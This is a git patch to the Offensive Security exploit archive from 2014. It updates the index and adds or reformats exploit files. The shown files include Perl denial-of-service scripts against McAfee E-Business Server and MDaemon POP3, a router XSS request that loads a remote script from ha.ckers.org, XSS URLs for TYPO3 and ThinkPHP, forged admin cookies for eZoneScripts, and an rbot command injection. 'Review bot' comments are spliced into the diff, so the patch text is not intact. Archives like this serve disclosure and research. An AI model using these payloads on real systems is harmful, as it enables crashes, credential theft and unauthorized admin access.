From ff9d2bfa96264b660f627dfefdcb0935ead35fb3 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 2 Jul 2014 04:39:03 +0000
Subject: [PATCH] Updated 07_02_2014

---
 files.csv | 19 ++++---
 platforms/hardware/remote/33938.txt | 28 ++++++++++
 platforms/linux/remote/581.c | 6 +--
 platforms/multiple/dos/4878.pl | 50 ++++++++---------
 platforms/multiple/dos/9454.txt | 78 +++++++++++++--------------
 platforms/multiple/webapps/33937.txt | 14 +++++
 platforms/php/webapps/33933.txt | 9 ++++
 platforms/php/webapps/33934.txt | 27 ++++++++++
 platforms/windows/dos/2245.pl | 80 ++++++++++++++--------
 platforms/windows/dos/874.cpp | 6 +--
 platforms/windows/remote/33935.txt | 9 ++++
 11 files changed, 209 insertions(+), 117 deletions(-)
 create mode 100755 platforms/hardware/remote/33938.txt
 create mode 100755 platforms/multiple/webapps/33937.txt
 create mode 100755 platforms/php/webapps/33933.txt
 create mode 100755 platforms/php/webapps/33934.txt
 create mode 100755 platforms/windows/remote/33935.txt

diff --git a/files.csv b/files.csv
index 189cbef44..657e3ad34 100755
--- a/files.csv
+++ b/files.csv
@@ -443,7 +443,7 @@ id,file,description,date,author,platform,type,port
 578,platforms/windows/dos/578.pl,"MS Windows NNTP Service (XPAT) Denial of Service Exploit (MS04-036)",2004-10-16,"Lucas Lavarello",windows,dos,0
 579,platforms/bsd/local/579.sh,"BSD bmon <= 1.2.1_2 - Local Exploit",2004-10-16,"Idan Nahoum",bsd,local,0
 580,platforms/linux/remote/580.c,"Monit <= 4.2 Basic Authentication Remote Root Exploit",2004-10-17,rtk,linux,remote,2812
-581,platforms/linux/remote/581.c,"ProFTPD <= 1.2.10 Remote Users Enumeration Exploit",2004-10-17,"Leon Juranic",linux,remote,0
+581,platforms/linux/remote/581.c,"ProFTPD <= 1.2.10 - Remote Users Enumeration Exploit",2004-10-17,"Leon Juranic",linux,remote,0
 582,platforms/windows/remote/582.c,"YahooPOPs <= 1.6 SMTP Remote Buffer Overflow Exploit",2004-10-18,"Diabolic Crab",windows,remote,25
 583,platforms/windows/remote/583.pl,"SLX Server 6.1 Arbitrary File Creation Exploit (PoC)",2004-10-18,"Carl Livitt",windows,remote,0
 584,platforms/windows/remote/584.c,"MS Windows Metafile (.emf) Heap Overflow Exploit (MS04-032)",2004-10-20,houseofdabus,windows,remote,0
@@ -694,7 +694,7 @@ id,file,description,date,author,platform,type,port
 871,platforms/php/webapps/871.txt,"phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial 2)",2005-03-11,Ali7,php,webapps,0
 872,platforms/php/webapps/872.pl,"SocialMPN Arbitrary File Injection Exploit",2005-03-11,y3dips,php,webapps,0
 873,platforms/php/webapps/873.txt,"phpDEV5 - Remote Default Insecure Users Vuln",2005-03-11,Ali7,php,webapps,0
-874,platforms/windows/dos/874.cpp,"Ethereal <= 0.10.9 ""3G-A11"" Remote Buffer Overflow Exploit (2)",2005-03-12,"Leon Juranic",windows,dos,0
+874,platforms/windows/dos/874.cpp,"Ethereal <= 0.10.9 ""3G-A11"" - Remote Buffer Overflow Exploit (2)",2005-03-12,"Leon Juranic",windows,dos,0
 875,platforms/windows/remote/875.c,"Sentinel LM 7.x UDP License Service Remote Buffer Overflow Exploit",2005-03-13,class101,windows,remote,5093
 876,platforms/linux/local/876.c,"PaX Double-Mirrored VMA munmap Local Root Exploit",2005-03-14,"Christophe Devine",linux,local,0
 877,platforms/linux/local/877.pl,"Frank McIngvale LuxMan 0.41 Local Buffer Overflow Exploit",2005-03-14,"Kevin Finisterre",linux,local,0
@@ -1938,7 +1938,7 @@ id,file,description,date,author,platform,type,port
 2242,platforms/solaris/local/2242.sh,"Solaris 8 / 9 (/usr/ucb/ps) Local Information Leak Exploit",2006-08-22,"Marco Ivaldi",solaris,local,0
 2243,platforms/php/webapps/2243.php,"Simple Machines Forum <= 1.1 rc2 Lock Topics Remote Exploit",2006-08-22,rgod,php,webapps,0
 2244,platforms/multiple/dos/2244.pl,"Mozilla Firefox <= 1.5.0.6 (FTP Request) Remote Denial of Service Exploit",2006-08-22,"Tomas Kempinsky",multiple,dos,0
-2245,platforms/windows/dos/2245.pl,"MDaemon POP3 Server < 9.06 (USER) Remote Buffer Overflow PoC",2006-08-22,"Leon Juranic",windows,dos,0
+2245,platforms/windows/dos/2245.pl,"MDaemon POP3 Server < 9.06 - (USER) Remote Buffer Overflow PoC",2006-08-22,"Leon Juranic",windows,dos,0
 2246,platforms/hardware/dos/2246.cpp,"2wire Modems/Routers CRLF - Denial of Service Exploit",2006-08-22,preth00nker,hardware,dos,0
 2247,platforms/php/webapps/2247.php,"MercuryBoard <= 1.1.4 (User-Agent) Remote SQL Injection Exploit",2006-08-23,rgod,php,webapps,0
 2248,platforms/php/webapps/2248.pl,"phpBB All Topics Mod <= 1.5.0 (start) Remote SQL Injection Exploit",2006-08-23,SpiderZ,php,webapps,0
@@ -4517,7 +4517,7 @@ id,file,description,date,author,platform,type,port
 4874,platforms/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0 (SP6) SaveFile() Insecure Method",2008-01-09,shinnai,windows,remote,0
 4876,platforms/php/webapps/4876.txt,"Tuned Studios Templates Local File Inclusion Vulnerability",2008-01-09,DSecRG,php,webapps,0
 4877,platforms/multiple/remote/4877.txt,"SAP MaxDB <= 7.6.03.07 pre-auth Remote Command Execution Exploit",2008-01-09,"Luigi Auriemma",multiple,remote,7210
-4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server Remote pre-auth Code Execution / DoS PoC",2008-01-09,"Leon Juranic",multiple,dos,0
+4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server - Remote pre-auth Code Execution / DoS PoC",2008-01-09,"Leon Juranic",multiple,dos,0
 4879,platforms/php/webapps/4879.php,"Docebo <= 3.5.0.3 (lib.regset.php) Command Execution Exploit",2008-01-09,EgiX,php,webapps,0
 4880,platforms/php/webapps/4880.php,"DomPHP <= 0.81 Remote Add Administrator Exploit",2008-01-10,j0j0,php,webapps,0
 4881,platforms/solaris/dos/4881.c,"SunOS 5.10 Remote ICMP Kernel Crash Exploit",2008-01-10,kingcope,solaris,dos,0
@@ -8917,7 +8917,7 @@ id,file,description,date,author,platform,type,port
 9451,platforms/php/webapps/9451.txt,"Dreampics Builder (exhibition_id) Remote SQL Injection Vulnerability",2009-08-18,Mr.SQL,php,webapps,0
 9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 (article) Blind SQL Injection Exploit",2009-08-18,Mr.SQL,php,webapps,0
 9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - (UploadID) SQL Injection Vuln",2009-08-18,Mr.SQL,php,webapps,0
-9454,platforms/multiple/dos/9454.txt,"Safari 4.0.2 (WebKit Parsing of Floating Point Numbers) BOF PoC",2009-08-18,"Leon Juranic",multiple,dos,0
+9454,platforms/multiple/dos/9454.txt,"Safari 4.0.2 - (WebKit Parsing of Floating Point Numbers) BOF PoC",2009-08-18,"Leon Juranic",multiple,dos,0
 9455,platforms/windows/dos/9455.html,"MS Internet Explorer (Javascript SetAttribute) Remote Crash Exploit",2009-08-18,"Irfan Asrar",windows,dos,0
 9456,platforms/hardware/remote/9456.txt,"ZTE ZXDSL 831 II Modem Arbitrary Add Admin User Vulnerability",2009-08-18,SuNHouSe2,hardware,remote,0
 9457,platforms/windows/dos/9457.pl,"broid 1.0 Beta 3a (.mp3 File) Local Buffer Overflow PoC",2009-08-18,hack4love,windows,dos,0
@@ -22877,7 +22877,7 @@ id,file,description,date,author,platform,type,port
 25785,platforms/asp/webapps/25785.txt,"Liberum Help Desk 0.97.3 - Multiple SQL Injection Vulnerabilities",2005-06-02,"Dedi Dwianto",asp,webapps,0
 25786,platforms/php/webapps/25786.txt,"MWChat 6.7 Start_Lobby.PHP Remote File Include Vulnerability",2005-06-03,Status-x,php,webapps,0
 25787,platforms/php/webapps/25787.txt,"LiteWeb Server 2.5 Authentication Bypass Vulnerability",2005-06-03,"Ziv Kamir",php,webapps,0
-25788,platforms/php/webapps/25788.txt,"Popper Webmail 1.41 ChildWindow.Inc.PHP Remote File Include Vulnerability",2005-06-03,"Leon Juranic",php,webapps,0
+25788,platforms/php/webapps/25788.txt,"Popper Webmail 1.41 - ChildWindow.Inc.PHP Remote File Include Vulnerability",2005-06-03,"Leon Juranic",php,webapps,0
 25789,platforms/linux/local/25789.c,"FUSE 2.2/2.3 - Local Information Disclosure Vulnerability",2005-06-06,"Miklos Szeredi",linux,local,0
 25790,platforms/asp/webapps/25790.txt,"WWWeb Concepts Events System 1.0 LOGIN.ASP SQL Injection Vulnerability",2005-06-06,Romty,asp,webapps,0
 25791,platforms/multiple/dos/25791.txt,"Rakkarsoft RakNet 2.33 Remote Denial of Service Vulnerability",2005-06-06,"Luigi Auriemma",multiple,dos,0
@@ -27999,7 +27999,7 @@ id,file,description,date,author,platform,type,port
 31201,platforms/php/webapps/31201.txt,"artmedic webdesign weblog Multiple Local File Include Vulnerabilities",2008-02-14,muuratsalo,php,webapps,0
 31202,platforms/php/webapps/31202.txt,"PlutoStatus Locator 1.0pre alpha 'index.php' Local File Include Vulnerability",2008-02-14,muuratsalo,php,webapps,0
 31203,platforms/multiple/dos/31203.txt,"Mozilla Firefox 2.0.0.12 IFrame Recursion Remote Denial of Service Vulnerability",2008-02-15,"Carl Hardwick",multiple,dos,0
-31204,platforms/windows/remote/31204.txt,"Sophos Email Appliance 2.1 Web Interface Multiple Cross-Site Scripting Vulnerabilities",2008-02-15,"Leon Juranic",windows,remote,0
+31204,platforms/windows/remote/31204.txt,"Sophos Email Appliance 2.1 - Web Interface Multiple Cross-Site Scripting Vulnerabilities",2008-02-15,"Leon Juranic",windows,remote,0
 31205,platforms/windows/dos/31205.txt,"Sami FTP Server 2.0.x Multiple Commands Remote Denial Of Service Vulnerabilities",2008-02-15,Cod3rZ,windows,dos,0
 31206,platforms/php/webapps/31206.txt,"Joomla! and Mambo 'com_smslist' Component - 'listid' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0
 31207,platforms/php/webapps/31207.txt,"Joomla! and Mambo 'com_activities' Component - 'id' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0
@@ -30559,3 +30559,8 @@ id,file,description,date,author,platform,type,port
 33926,platforms/windows/dos/33926.py,"ddrLPD 1.0 Remote Denial of Service Vulnerability",2010-04-29,"Bisphemol A",windows,dos,0
 33927,platforms/php/webapps/33927.txt,"eZoneScripts Apartment Search Script 'listtest.php' SQL Injection Vulnerability",2010-02-09,JIKO,php,webapps,0
 33929,platforms/multiple/remote/33929.py,"Gitlist <= 0.4.0 - Remote Code Execution",2014-06-30,drone,multiple,remote,0
+33933,platforms/php/webapps/33933.txt,"ThinkPHP 2.0 'index.php' Cross Site Scripting Vulnerability",2010-02-09,zx,php,webapps,0
+33934,platforms/php/webapps/33934.txt,"eZoneScripts Multiple Scripts Insecure Cookie Authentication Bypass Vulnerability",2009-02-09,JIKO,php,webapps,0
+33935,platforms/windows/remote/33935.txt,"rbot 0.9.14 - '!react' Command Unauthorized Access Vulnerability",2010-02-24,nks,windows,remote,0
+33937,platforms/multiple/webapps/33937.txt,"TYPO3 't3m_cumulus_tagcloud' Extension 1.0 HTML Injection and Cross-Site Scripting Vulnerabilities",2010-05-05,MustLive,multiple,webapps,0
+33938,platforms/hardware/remote/33938.txt,"Sterlite SAM300 AX Router 'Stat_Radio' Parameter Cross-Site Scripting Vulnerability",2010-02-04,"Karn Ganeshen",hardware,remote,0
diff --git a/platforms/hardware/remote/33938.txt b/platforms/hardware/remote/33938.txt
new file mode 100755
index 000000000..df611a69f
--- /dev/null
+++ b/platforms/hardware/remote/33938.txt
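Review bot: The new 33934 row is dated 2009-02-09, which looks like a one-digit slip for 2010-02-09: the existing 33927 row in the same hunk (also eZoneScripts, also JIKO) is dated 2010-02-09, and 33934.txt cites BID 39912, which sits between BID 39909 (row 33933, dated 2010-02-09) and BID 39915 (row 33935, dated 2010-02-24). A wrong year only affects the index, but date-sorted queries over files.csv would misplace the entry by a year. Suggested row: `33934,platforms/php/webapps/33934.txt,"eZoneScripts Multiple Scripts Insecure Cookie Authentication Bypass Vulnerability",2010-02-09,JIKO,php,webapps,0`; confirm against the BugTraq entry before changing it.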
@@ -0,0 +1,28 @@
+source: http://www.securityfocus.com/bid/39928/info
+
+The Sterlite SAM300 AX Router is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+*+POST Request+*
+
+POST http://192.168.1.1/Forms/status_statistics_1 HTTP/1.1
+Host: 192.168.1.1
+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7)
+Gecko/20091221 Firefox/3.5.7 Paros/3.2.13
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-us,en;q=0.5
+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+Keep-Alive: 300
+Proxy-Connection: keep-alive
+Referer: http://192.168.1.1/status/status_statistics.htm
+Authorization: Basic YWRtaW46YWRtaW4=
+Content-Type: application/x-www-form-urlencoded
+Content-length: 101
+
+*+POST Parameters+*
+
+Stat_Radio=%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org
+%2Fxss.js%3E%3C%2FSCRIPT%3E&StatRefresh=REFRESH
+
+*+Impact+*
diff --git a/platforms/linux/remote/581.c b/platforms/linux/remote/581.c
index e4f70d0b8..6d1247889 100755
--- a/platforms/linux/remote/581.c
+++ b/platforms/linux/remote/581.c
@@ -58,6 +58,6 @@ printf (" %d |",dist);
 }
 printf ("\nAvrg: %d\n",(stat/PROBE));
 close (sock);
-}
-
-// milw0rm.com [2004-10-17]
+}
+
+// milw0rm.com [2004-10-17]
diff --git a/platforms/multiple/dos/4878.pl b/platforms/multiple/dos/4878.pl
index e48f97421..fec53043e 100755
--- a/platforms/multiple/dos/4878.pl
+++ b/platforms/multiple/dos/4878.pl
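Review bot: The new 33938.txt ends on the `*+Impact+*` heading with nothing under it, so the Impact section is empty; either drop the heading or carry over the one-sentence impact already given in the BID summary at the top of the file. Separately, the captured request includes an `Authorization: Basic` header, so the reflected Stat_Radio injection appears to have been observed from an authenticated session on the router; stating that explicitly helps readers judge exposure, e.g. `Note: the request above carries HTTP Basic credentials; the issue was observed from an authenticated session.` Whether the endpoint is reachable without credentials is not shown here and should be hedged rather than implied.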
@@ -1,25 +1,25 @@
-#!/usr/bin/perl
-#
-#
-# McAfee(R) E-Business Server(TM) 8.5.2 Remote preauth crash (PoC)
-#
-# - tested on Windows and Linux
-#
-#
-# Leon Juranic ,
-# Infigo IS
-#
-
-
-use IO::Socket;
-
-$saddr = "192.168.1.3";
-$sport = 1718;
-
-$exp1 = "\x01\x3f\x2f\x05\x25\x2a" . "A" x 69953;;
-
-print "> Sending exploit string...\n";
-my $server_sock = IO::Socket::INET->new (PeerAddr => $saddr, PeerPort => $sport) || die ("Cannot connect to server!!!\n\n");
-print $server_sock $exp1;
-
-# milw0rm.com [2008-01-09]
+#!/usr/bin/perl
+#
+#
+# McAfee(R) E-Business Server(TM) 8.5.2 Remote preauth crash (PoC)
+#
+# - tested on Windows and Linux
+#
+#
+# Leon Juranic ,
+# Infigo IS
+#
+
+
+use IO::Socket;
+
+$saddr = "192.168.1.3";
+$sport = 1718;
+
+$exp1 = "\x01\x3f\x2f\x05\x25\x2a" . "A" x 69953;;
+
+print "> Sending exploit string...\n";
+my $server_sock = IO::Socket::INET->new (PeerAddr => $saddr, PeerPort => $sport) || die ("Cannot connect to server!!!\n\n");
+print $server_sock $exp1;
+
+# milw0rm.com [2008-01-09]
diff --git a/platforms/multiple/dos/9454.txt b/platforms/multiple/dos/9454.txt
index 6c6c94261..a67f33955 100755
--- a/platforms/multiple/dos/9454.txt
+++ b/platforms/multiple/dos/9454.txt
@@ -1,39 +1,39 @@ -Three weeks ago, I coded a nice little browser fuzzer, and started -playing with various browsers: IE, Firefox, Safari, Chrome, Opera... - -I found an interesting Safari crash after couple of hours of fuzzing. -It was a stack overflow (and a smile on my face). Since then, every now -and then I took some time to play with it. - -Today, I noticed that Apple updated Safari 4.0.2 to 4.0.3. -Among some other vulnerabilities, this vulnerability has also been fixed. -The Apple announcement is available at -http://lists.apple.com/archives/security-announce/2009/Aug/msg00002.html. - -Depends on the perspective, but from my own - Very Bad Luck. C'est la vie, -things like this happen... Some bugs die young. - -This simple and interesting vulnerability is located in WebKit's -JavaScript code that parses floating point numbers. It can be triggered -with script like this: - ---------- - ---------- - -Or something like this... - ---------- - ---------- - -Play little bit with numbers to get a desirable return address, little -bit of heap spraying, and it works. - - -Regards, -Leon Juranic - -# milw0rm.com [2009-08-18] +Three weeks ago, I coded a nice little browser fuzzer, and started +playing with various browsers: IE, Firefox, Safari, Chrome, Opera... + +I found an interesting Safari crash after couple of hours of fuzzing. +It was a stack overflow (and a smile on my face). Since then, every now +and then I took some time to play with it. + +Today, I noticed that Apple updated Safari 4.0.2 to 4.0.3. +Among some other vulnerabilities, this vulnerability has also been fixed. +The Apple announcement is available at +http://lists.apple.com/archives/security-announce/2009/Aug/msg00002.html. + +Depends on the perspective, but from my own - Very Bad Luck. C'est la vie, +things like this happen... Some bugs die young. + +This simple and interesting vulnerability is located in WebKit's +JavaScript code that parses floating point numbers. 
It can be triggered +with script like this: + +--------- + +--------- + +Or something like this... + +--------- + +--------- + +Play little bit with numbers to get a desirable return address, little +bit of heap spraying, and it works. + + +Regards, +Leon Juranic + +# milw0rm.com [2009-08-18]
diff --git a/platforms/multiple/webapps/33937.txt b/platforms/multiple/webapps/33937.txt
new file mode 100755
index 000000000..36587e719
--- /dev/null
+++ b/platforms/multiple/webapps/33937.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/39926/info
+
+
+TYPO3 't3m_cumulus_tagcloud' extension is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage the issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
+
+TYPO3 't3m_cumulus_tagcloud' version 1.0 is affected; other versions may be vulnerable as well.
+
+Example URIs are available:
+
+http://www.example.com/modules/mod_joomulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
+
+http://www.example.com/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/33933.txt b/platforms/php/webapps/33933.txt
new file mode 100755
index 000000000..6d946ef71
--- /dev/null
+++ b/platforms/php/webapps/33933.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/39909/info
+
+ThinkPHP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+ThinkPHP 2.0 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/index.php?s=1%3Cbody+onload=alert(1)%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/33934.txt b/platforms/php/webapps/33934.txt
new file mode 100755
index 000000000..f2bb86aad
--- /dev/null
+++ b/platforms/php/webapps/33934.txt
@@ -0,0 +1,27 @@
+source: http://www.securityfocus.com/bid/39912/info
+
+eZoneScripts Banner Exchange Website, Adult Banner Exchange Website, Apartment Search Script, phpMiniSite Script, and Classified Ultra Script are prone to an authentication-bypass vulnerability because they fail to adequately verify user-supplied input used for cookie-based authentication.
+
+Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks.
+
+The following example cookie data is available:
+
+Banner Exchange Website and Adult Banner Exchange Website:
+
+javascript:document.cookie="bannerexchangename=admin; path=/";
+javascript:document.cookie="bannerexchangerand=905; path=/";
+
+
+Classified Ultra Script:
+
+javascript:document.cookie="AdminPass=1; path=/productdemos/ClassifiedUltra/Site_Admin/";
+
+
+Apartment Search Script:
+
+javascript:document.cookie="SiteAdminPass=1; path=/productdemos/ApartmentSearch/Site_Admin/";
+
+
+phpMiniSite Script:
+
+javascript:document.cookie="auth=fook; path=/";
\ No newline at end of file
diff --git a/platforms/windows/dos/2245.pl b/platforms/windows/dos/2245.pl
index 9073f4698..6d323dac5 100755
--- a/platforms/windows/dos/2245.pl
+++ b/platforms/windows/dos/2245.pl
@@ -1,40 +1,40 @@
-#
-# PoC for Mdaemon POP3 preauth heap overflow
-#
-# Coded by Leon Juranic
-# Infigo IS
-#
-#
-
-$host = '192.168.0.105';
-
-use IO::Socket;
-
-for ($x = 0 ; $x < 12 ; $x++)
-{
- $sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110', Proto => 'tcp')
- || die "socket error\n\n";
- recv ($sock, $var, 10000,0);
- print $var;
- print $sock "USER " . "\@A" x 160 . "\r\n";
- recv ($sock, $var, 10000,0);
- print $var;
- print $sock "QUIT\r\n";
- recv ($sock, $var, 10000,0);
- print $var;
- close ($sock);
- sleep(1);
-}
- $sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110', Proto => 'tcp')
- || die "socket error\n\n";
- recv ($sock, $var, 10000,0);
- print $var;
- print $sock "USER " . "\@A\@A" . "B" x 326 . "\r\n";
- recv ($sock, $var, 10000,0);
- print $var;
- print $sock "USER " . "\'A" x 337 . "\r\n";
- recv ($sock, $var, 10000,0);
- print $var;
- sleep(2);
-
-# milw0rm.com [2006-08-22]
+#
+# PoC for Mdaemon POP3 preauth heap overflow
+#
+# Coded by Leon Juranic
+# Infigo IS
+#
+#
+
+$host = '192.168.0.105';
+
+use IO::Socket;
+
+for ($x = 0 ; $x < 12 ; $x++)
+{
+ $sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110', Proto => 'tcp')
+ || die "socket error\n\n";
+ recv ($sock, $var, 10000,0);
+ print $var;
+ print $sock "USER " . "\@A" x 160 . "\r\n";
+ recv ($sock, $var, 10000,0);
+ print $var;
+ print $sock "QUIT\r\n";
+ recv ($sock, $var, 10000,0);
+ print $var;
+ close ($sock);
+ sleep(1);
+}
+ $sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110', Proto => 'tcp')
+ || die "socket error\n\n";
+ recv ($sock, $var, 10000,0);
+ print $var;
+ print $sock "USER " . "\@A\@A" . "B" x 326 . "\r\n";
+ recv ($sock, $var, 10000,0);
+ print $var;
+ print $sock "USER " . "\'A" x 337 . "\r\n";
+ recv ($sock, $var, 10000,0);
+ print $var;
+ sleep(2);
+
+# milw0rm.com [2006-08-22]
diff --git a/platforms/windows/dos/874.cpp b/platforms/windows/dos/874.cpp
index bd40bdd80..254bf70a9 100755
--- a/platforms/windows/dos/874.cpp
+++ b/platforms/windows/dos/874.cpp
@@ -78,6 +78,6 @@ main (int argc, char **argv) { xp_sendpacket(argv[1]); -} - -// milw0rm.com [2005-03-12] +} + +// milw0rm.com [2005-03-12]
diff --git a/platforms/windows/remote/33935.txt b/platforms/windows/remote/33935.txt
new file mode 100755
index 000000000..037d75c44
--- /dev/null
+++ b/platforms/windows/remote/33935.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/39915/info
+
+Rbot is prone to an unauthorized-access vulnerability because it fails to adequately sanitize user supplied data.
+
+An attacker can exploit this vulnerability to gain administrative rights to the rbot application. This will allow a remote attacker to execute Ruby code within the context of the affected application; other attacks may be possible.
+
+rbot 0.9.14 is vulnerable; other versions may also be affected.
+
+ !react to /attacker:.*/ with cmd:whoami
\ No newline at end of file